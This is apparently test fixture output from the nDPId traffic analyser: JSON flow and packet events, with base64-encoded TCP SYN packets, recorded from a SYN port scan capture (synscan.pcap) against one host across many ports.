+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EEAADsGKTGsEAAIQA2GNIzTII3dU4MZAAAAAGACEAAH\/wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsaQQAAC0Gsm6sEAAIQA2GNIzTDvTdU4MZAAAAAGACCAAhmAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsWokAAC0GwOmsEAAIQA2GNIzTF+vdU4MZAAAAAGACCAAYoQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsA3wAAC0GF\/esEAAIQA2GNIzTB\/jdU4MZAAAAAGACCAAolAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs5fgAACwGNnqsEAAIQA2GNIzTBizdU4MZAAAAAGACBAAuYAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs2OsAADMGPIesEAAIQA2GNIzTIzPdU4MZAAAAAGACEAAFWQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsPK0AADcG1MWsEAAIQA2GNIzTBK7dU4MZAAAAAGACEAAj3gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs7dgAADoGIJqsEAAIQA2GNIzTF6vdU4MZAAAAAGACDAAU4QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAstjAAAC4GZEKsEAAIQA2GNIzTA4\/dU4MZAAAAAGACDAAo\/QAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsdgUAADAGom2sEAAIQA2GNIzTB\/3dU4MZAAAAAGACBAAsjwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAscB4AACgGsFSsEAAIQA2GNIzTE8XdU4MZAAAAAGACBAAgxwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061212,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_packet_id":1,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061212,"pkt":"ACYLMQczACWzv5HuCABFAAAsgvYAADYGj3ysEAAIQA2GNIzTBZrdU4MZAAAAAGACDAAm8gAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061212,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_packet_id":1,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061212,"pkt":"ACYLMQczACWzv5HuCABFAAAszC8AADYGRkOsEAAIQA2GNIzT92PdU4MZAAAAAGACDAA1KAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061213,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_packet_id":1,"flow_last_seen":1278275061213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061213,"pkt":"ACYLMQczACWzv5HuCABFAAAsKEUAAC4G8i2sEAAIQA2GNIzTxNXdU4MZAAAAAGACDABntgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsDBEAACsGEWKsEAAIQA2GNIzTBNTdU4MZAAAAAGACEAAjuAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsbRQAACYGtV6sEAAIQA2GNIzTB9jdU4MZAAAAAGACDAAktAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsyTQAACUGWj6sEAAIQA2GNIzTBA7dU4MZAAAAAGACCAAsfgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsQj4AACwG2jSsEAAIQA2GNIzSAQPdUoMYAAAAAGACBAAzjAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsc\/gAACgGrHqsEAAIQA2GNIzSKAPdUoMYAAAAAGACBAAMjAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsTJkAAC0GztmsEAAIQA2GNIzSB\/HdUoMYAAAAAGACCAAongAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsUQEAAC4GyXGsEAAIQA2GNIzSFubdUoMYAAAAAGACDAAVqQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAstS4AAC4GZUSsEAAIQA2GNIzSH53dUoMYAAAAAGACDAAM8gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsxqwAADsGRsasEAAIQA2GNIzSALPdUoMYAAAAAGACEAAn3AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsKv8AADkG5HOsEAAIQA2GNIzSB8DdUoMYAAAAAGACCAAozwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsR8wAAC0G06asEAAIQA2GNIzSJpXdUoMYAAAAAGACCAAJ+gAAAgQFtA=="} 